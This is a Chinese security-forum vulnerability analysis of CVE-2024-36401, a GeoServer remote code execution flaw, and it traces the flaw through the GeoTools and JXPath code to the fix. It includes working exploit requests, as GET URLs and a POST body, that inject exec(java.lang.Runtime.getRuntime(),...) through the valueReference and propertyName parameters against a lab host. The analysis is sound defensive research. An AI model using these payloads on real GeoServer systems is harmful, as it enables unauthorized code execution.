zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
<body>
<div class="global-nav mb-50">
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container nav">
<div class="visible-xs header-response sf-hidden">
</div>
<div class="row hidden-xs">
<div class="col-sm-8 col-md-8 col-lg-8">
<div class=navbar-header>
<button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
</button>
<div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
</div>
<div class="collapse navbar-collapse" id=global-navbar>
<ul class="nav navbar-nav">
<li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
<li><a href=https://forum.butian.net/questions>问答</a></li>
<li><a href=https://forum.butian.net/shop>商城</a></li>
<li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
<li><a href=https://forum.butian.net/movable>活动</a></li>
<li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
</li>
</ul>
<form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
<span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
<input type=text name=word id=searchBox class=form-control placeholder value>
</form>
</div>
</div>
</div>
</div>
</nav>
</div>
<div class="top-alert mt-60 clearfix text-center">
<!--[if lt IE 9]>
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
</div>
<![endif]-->
</div>
<div class=wrap>
<div class=container>
<div class="row mt-10">
<div class="col-xs-12 col-md-9 main" style=width:100%>
<div class=widget-article>
<h3 class="title word-wrap">CVE-2024-36401 GeoServer远程代码执行</h3>
<ul class=taglist-inline>
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
</ul>
<div class="content mt-10">
<div class="quote mb-20">
GeoServer调用的GeoTools库API在解析特性类型的属性/属性名称时以不安全的方式将它们传递给commons-jxpath库当解析XPath表达式时可以执行任意代码。
</div>
<textarea id=md_view_content style=display:none>前言
==
GeoServer是一个用Java编写的开源软件服务器允许用户共享和编辑地理空间数据。它为提供交互操作性而设计使用开放标准发布来自任何主要空间数据源的数据。
漏洞描述
====
该系统不安全地将属性名称解析为 XPath 表达式。GeoServer 调用的 GeoTools 库 API 以不安全的方式将要素类型的属性名称传递给 commons-jxpath 库。该库在解析 XPath 表达式时,可以执行任意代码。影响范围:`GeoServer &lt; 2.23.6` `2.24.0 &lt;= GeoServer &lt; 2.24.4` `2.25.0 &lt;= GeoServer &lt; 2.25.2`
环境搭建
====
代码可以直接去github下载自己编译运行&lt;https://github.com/geoserver/geoserver/&gt;
或在Vulhub下载对应的docker-compose.yml
```php
version: '3'
services:
web:
&nbsp; image: vulhub/geoserver:2.23.2
&nbsp; ports:
&nbsp; - "8080:8080"
&nbsp; - "5005:5005"
```
建议用Vulhub的环境方便快捷
漏洞分析
====
当我写这篇文章时该漏洞的复现文章和POC已经传遍全网在此简单的复现没有什么意义不如分析一下知其来龙去脉岂不妙哉
首先分析官方通告:&lt;https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv&gt;
主要看这两段话:
```php
Details
The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to ALL GeoServer instances.
PoC
No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests.
```
对应翻译:
```php
详情
GeoServer调用的GeoTools库API在评估要素类型的特征/属性名称时以一种不安全的方式传递给commons-jxpath库该库在评估XPath表达式时可以执行任意代码。这种XPath评估本意仅用于复杂要素类型应用程序模式数据存储但错误地也被应用于简单要素类型这使得这个漏洞适用于所有GeoServer实例。
PoC
没有提供公开的PoC但这个漏洞已被确认可以通过WFS GetFeature、WFS GetPropertyValue、WMS GetMap、WMS GetFeatureInfo、WMS GetLegendGraphic和WPS Execute请求来利用。
```
总的来说是`GeoTools库`的问题这个库用的xpath引擎是Apache Commons Jxpath,参考[CVE-2022-41852](https://tttang.com/archive/1771/) ,
再看GeoTools的漏洞通告&lt;https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w&gt;
```php
以下方法将 XPath 表达式传递给commons\-jxpath库该库可以执行任意代码如果 XPath 表达式由用户输入提供,则会造成安全问题。
org.geotools.appschema.util.XmlXpathUtilites.getXPathValues(NamespaceSupport, String, Document)
org.geotools.appschema.util.XmlXpathUtilites.countXPathNodes(NamespaceSupport, String, Document)
org.geotools.appschema.util.XmlXpathUtilites.getSingleXPathValue(NamespaceSupport, String, Document)
org.geotools.data.complex.expression.FeaturePropertyAccessorFactory.FeaturePropertyAccessor.get(Object, String, Class&lt;T\&gt;)
org.geotools.data.complex.expression.FeaturePropertyAccessorFactory.FeaturePropertyAccessor.set(Object, String, Object, Class)
org.geotools.data.complex.expression.MapPropertyAccessorFactory.new PropertyAccessor() {...}.get(Object, String, Class&lt;T\&gt;)
org.geotools.xsd.StreamingParser.StreamingParser(Configuration, InputStream, String)
```
在此我们相当于得到了Sinks , 而source在GeoServer的漏洞通告的POC已经提示了几个接口`WFS GetFeature`、`WFS GetPropertyValue`、`WMS GetMap`、`WMS GetFeatureInfo`、`WMS GetLegendGraphic`和`WPS Execute`
GetPropertyValue
----------------
去官方找这几个接口的[用例](https://github.com/geoserver/geoserver/blob/2.23.2/doc/en/user/source/services/wfs/reference.rst),以网传使用的`WFS GetPropertyValue`接口为例,
![image-20240703172048501](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-cdcbd2bd4c200a32929a7011cfb3894d82bb0634.png)
如图所示,`GetPropertyValue`的作用是从查询所标识的给定要素集的数据源中检索要素属性的值或复杂要素属性值的部分,其中`valueReference`是要检索不同属性的值猜测这里是注入的地方注意的是typeName的值必须是存在的类型不能乱填
在上面提到的sinks下断点输入url查看停到哪个断点上
```php
http://192.168.79.147:8080/geoserver/wfs?service=WFS&amp;version=2.0.0&amp;request=GetPropertyValue&amp;typeNames=sf:archsites&amp;valueReference=ssssss
```
![image-20240703173435323](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-fb253bc287f0afe70eb11a8913902fcae7c2330c.png)
发现断点在`org.geotools.data.complex.expression.FeaturePropertyAccessorFactory.FeaturePropertyAccessor.get()`方法上此时的xpath参数的值正是`valueReference`的值,说明这里是注入点
根据调用栈,往前看,从`org.geoserver.wfs.GetPropertyValue`的run方法开始
![image-20240703174400531](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-ef4ce69433b565333fc23b222adc6a5d98b5c7bc.png)
run方法获取请求对象然后就是各种解析其中发现这里会把valueReference的值进行一个正则匹配将\[\]中的内容和\[\]替换为空
跟进evaluate()方法查看
![image-20240703175841396](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-3b0a54ae7b28f43a4a45ab20e8c4db14e39b9ed3.png)
继续跟进
![image-20240703180031295](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-146459cb5cbbcb27060c39e31bef3108182f8b83.png)
在这个evaluate()方法里调用了一个get方法accessor是FeaturePropertyAccessor的实例。如果分析漏洞是时候是搜索所有FeaturePropertyAccessor的引用根本没办法搜到CodeQL这类静态分析工具来分析漏洞时就可能会错过
回到get方法
![image-20240703180644333](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-0ccc33707a5e8ef4605d780fb1e718b12010c961.png)
这里先获取context然后调用`iteratePointers`方法,
![image-20240703205401744](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-09461deac28c6f31cb4e784a23f63bea1cf6f39a.png)
跟进`this.compileExpression`
![image-20240703205511833](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-3fbfa75959f71c04bcbf6f019b1b6f4229dbad60.png)
对传入的xpath进行编译,如果前面编译过了,这里直接返回
往下就来到了`org.apache.commons.jxpath.ri.compiler.Expression`这个类的`iteratePointers`方法
![image-20240703210552154](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-21f206d925c38b042004773805f03fc9bcc3410c.png)
这个会根据刚刚编译返回的对象跳转到对应的compute方法
因为传入的`valueReference=sssss`,会跳转到`org.apache.commons.jxpath.ri.compiler.LocationPath`的compute方法
![image-20240703212038558](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-795fcfe787538c31e7b84d8eebe3d21d468204af.png)
如果传入的`valueReference=exec(java.lang.Runtime.getRuntime(),'touch /tmp/pwn')` payload来源为&lt;https://tttang.com/archive/1771/&gt;
则跳转到`org.apache.commons.jxpath.ri.compiler.ExtensionFunction的compute`
![image-20240703211445191](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-998efb3417eb871fbb4b18e870d3de703a635488.png)
继续跟进来到computeValue
![image-20240703211554584](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-b7da425c00686785504478545f7dc2b64722d846.png)
这里获得了org.apache.commons.jxpath.Function对应的这个实例后回去调用具体的invoke的实现
运行结果
![image-20240703212252759](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-979e345e155faf20f13fd072430b1ecb330282a8.png)
根据官网教程还可以使用POST请求
```http
POST /geoserver/wfs HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 ldwk
Accept: \*/\*Accept-Language: en-US,en;q=0.5Content-Length: 329
&lt;wfs:GetPropertyValue service='WFS' version='2.0.0'xmlns:topp='http://www.openplans.org/topp'xmlns:fes='http://www.opengis.net/fes/2.0'xmlns:wfs='http://www.opengis.net/wfs/2.0'valueReference='exec(java.lang.Runtime.getRuntime(),"touch /tmp/pwn")'&gt;&lt;wfs:Query typeNames='topp:states'/&gt;
&lt;/wfs:GetPropertyValue&gt;
```
GetFeature
----------
同理进行测试,得到传入的参数是`propertyName`
```php
http://192.168.79.147:8080/geoserver/wfs?service=wfs&amp;version=2.0.0&amp;request=GetFeature&amp;typeNames=topp:states&amp;featureID=feature&amp;propertyName=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/pwn2')
```
经过调试发现payload被逗号分割截断了传入的xpath变成了`exec(java.lang.Runtime.getRuntime()`需要换个payload
漏洞修复
====
GeoServer官方给出的修复方案是更新最新版或者下载补丁包括已修复的 gt-app-schema、gt-complex 和 gt-xsd-core jar 文件似乎只是更新了geotools的依赖
而geotools官方给出的修复是修改对XPath 表达式的处理:&lt;https://github.com/geotools/geotools/commit/fa187593abd5784d4338e7b5fff97eb47ce60b78&gt;
前面提到的Sinks添加了安全检查`newSafeContext`,例如FeaturePropertyAccessorFactory类的get方法
![image-20240704104109653](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-49f35291f8ce7e97127d119600842e97c2c99dc5.png)
org.geotools.xsd.impl.jxpath.JXPathUtils是新添加的一个类禁止通过 XPath 表达式调用 Java 方法
![image-20240704104502829](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-155eefa763079c9efc7431de29989fce00dd3a02.png)
参考:
===
&lt;https://tttang.com/archive/1771/&gt;
&lt;https://github.com/geoserver/geoserver/blob/2.23.2/doc/en/user/source/services/wfs/reference.rst&gt;
&lt;https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w&gt;
&lt;https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv&gt;</textarea>
<div id=layer-photos-demo>
<div id=md_view><div class=markdown-body><h1 blockindex=0>前言</h1>
<p blockindex=1>GeoServer是一个用Java编写的开源软件服务器允许用户共享和编辑地理空间数据。它为提供交互操作性而设计使用开放标准发布来自任何主要空间数据源的数据。</p>
<h1 blockindex=2>漏洞描述</h1>
<p blockindex=3>该系统不安全地将属性名称解析为 XPath 表达式。GeoServer 调用的 GeoTools 库 API 以不安全的方式将要素类型的属性名称传递给 commons-jxpath 库。该库在解析 XPath 表达式时,可以执行任意代码。影响范围:<code>GeoServer &lt; 2.23.6</code> <code>2.24.0 &lt;= GeoServer &lt; 2.24.4</code> <code>2.25.0 &lt;= GeoServer &lt; 2.25.2</code></p>
<h1 blockindex=4>环境搭建</h1>
<p blockindex=5>代码可以直接去github下载自己编译运行<a href=https://github.com/geoserver/geoserver/>https://github.com/geoserver/geoserver/</a></p>
<p blockindex=6>或在Vulhub下载对应的docker-compose.yml</p>
<pre blockindex=7><code class="hljs language-php">version: <span class=hljs-string>'3'</span>
services:
web:
&nbsp; image: vulhub/geoserver:<span class=hljs-number>2.23</span>.<span class=hljs-number>2</span>
&nbsp; ports:
&nbsp; - <span class=hljs-string>"8080:8080"</span>
&nbsp; - <span class=hljs-string>"5005:5005"</span>
</code></pre>
<p blockindex=8>建议用Vulhub的环境方便快捷</p>
<h1 blockindex=9>漏洞分析</h1>
<p blockindex=10>当我写这篇文章时该漏洞的复现文章和POC已经传遍全网在此简单的复现没有什么意义不如分析一下知其来龙去脉岂不妙哉</p>
<p blockindex=11>首先分析官方通告:<a href=https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv>https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv</a></p>
<p blockindex=12>主要看这两段话:</p>
<pre blockindex=13><code class="hljs language-php">Details
The GeoTools library API that GeoServer calls evaluates property/attribute names <span class=hljs-keyword>for</span> feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types <span class=hljs-keyword>as</span> well which makes this vulnerability apply to ALL GeoServer instances.
PoC
No <span class=hljs-keyword>public</span> PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic <span class=hljs-keyword>and</span> WPS Execute requests.
</code></pre>
<p blockindex=14>对应翻译:</p>
<pre blockindex=15><code class="hljs language-php">详情
GeoServer调用的GeoTools库API在评估要素类型的特征/属性名称时以一种不安全的方式传递给commons-jxpath库该库在评估XPath表达式时可以执行任意代码。这种XPath评估本意仅用于复杂要素类型应用程序模式数据存储但错误地也被应用于简单要素类型这使得这个漏洞适用于所有GeoServer实例。
PoC
没有提供公开的PoC但这个漏洞已被确认可以通过WFS GetFeature、WFS GetPropertyValue、WMS GetMap、WMS GetFeatureInfo、WMS GetLegendGraphic和WPS Execute请求来利用。
</code></pre>
<p blockindex=16>总的来说是<code>GeoTools库</code>的问题这个库用的xpath引擎是Apache Commons Jxpath,参考<a href=https://tttang.com/archive/1771/>CVE-2022-41852</a> ,</p>
<p blockindex=17>再看GeoTools的漏洞通告<a href=https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w>https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w</a></p>
<pre blockindex=18><code class="hljs language-php">以下方法将 XPath 表达式传递给commons\-jxpath库该库可以执行任意代码如果 XPath 表达式由用户输入提供,则会造成安全问题。
org.geotools.appschema.util.XmlXpathUtilites.getXPathValues(NamespaceSupport, <span class=hljs-keyword>String</span>, Document)
org.geotools.appschema.util.XmlXpathUtilites.countXPathNodes(NamespaceSupport, <span class=hljs-keyword>String</span>, Document)
org.geotools.appschema.util.XmlXpathUtilites.getSingleXPathValue(NamespaceSupport, <span class=hljs-keyword>String</span>, Document)
org.geotools.data.complex.expression.FeaturePropertyAccessorFactory.FeaturePropertyAccessor.get(<span class=hljs-keyword>Object</span>, <span class=hljs-keyword>String</span>, <span class=hljs-class><span class=hljs-keyword>Class</span>&lt;<span class=hljs-title>T</span>\&gt;)
<span class=hljs-title>org</span>.<span class=hljs-title>geotools</span>.<span class=hljs-title>data</span>.<span class=hljs-title>complex</span>.<span class=hljs-title>expression</span>.<span class=hljs-title>FeaturePropertyAccessorFactory</span>.<span class=hljs-title>FeaturePropertyAccessor</span>.<span class=hljs-title>set</span>(<span class=hljs-title>Object</span>, <span class=hljs-title>String</span>, <span class=hljs-title>Object</span>, <span class=hljs-title>Class</span>)
<span class=hljs-title>org</span>.<span class=hljs-title>geotools</span>.<span class=hljs-title>data</span>.<span class=hljs-title>complex</span>.<span class=hljs-title>expression</span>.<span class=hljs-title>MapPropertyAccessorFactory</span>.<span class=hljs-title>new</span> <span class=hljs-title>PropertyAccessor</span>() </span>{...}.get(<span class=hljs-keyword>Object</span>, <span class=hljs-keyword>String</span>, <span class=hljs-class><span class=hljs-keyword>Class</span>&lt;<span class=hljs-title>T</span>\&gt;)
<span class=hljs-title>org</span>.<span class=hljs-title>geotools</span>.<span class=hljs-title>xsd</span>.<span class=hljs-title>StreamingParser</span>.<span class=hljs-title>StreamingParser</span>(<span class=hljs-title>Configuration</span>, <span class=hljs-title>InputStream</span>, <span class=hljs-title>String</span>)
</span></code></pre>
<p blockindex=19>在此我们相当于得到了Sinks , 而source在GeoServer的漏洞通告的POC已经提示了几个接口<code>WFS GetFeature</code><code>WFS GetPropertyValue</code><code>WMS GetMap</code><code>WMS GetFeatureInfo</code><code>WMS GetLegendGraphic</code><code>WPS Execute</code></p>
<h2 blockindex=20>GetPropertyValue</h2>
<p blockindex=21>去官方找这几个接口的<a href=https://github.com/geoserver/geoserver/blob/2.23.2/doc/en/user/source/services/wfs/reference.rst>用例</a>,以网传使用的<code>WFS GetPropertyValue</code>接口为例,</p>
<p blockindex=22><img src=data:image/png;base64,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
<p blockindex=23>如图所示,<code>GetPropertyValue</code>的作用是从查询所标识的给定要素集的数据源中检索要素属性的值或复杂要素属性值的部分,其中<code>valueReference</code>是要检索不同属性的值猜测这里是注入的地方注意的是typeName的值必须是存在的类型不能乱填</p>
<p blockindex=24>在上面提到的sinks下断点输入url查看停到哪个断点上</p>
<pre blockindex=25><code class="hljs language-php">http:<span class=hljs-comment>//192.168.79.147:8080/geoserver/wfs?service=WFS&amp;version=2.0.0&amp;request=GetPropertyValue&amp;typeNames=sf:archsites&amp;valueReference=ssssss</span>
</code></pre>
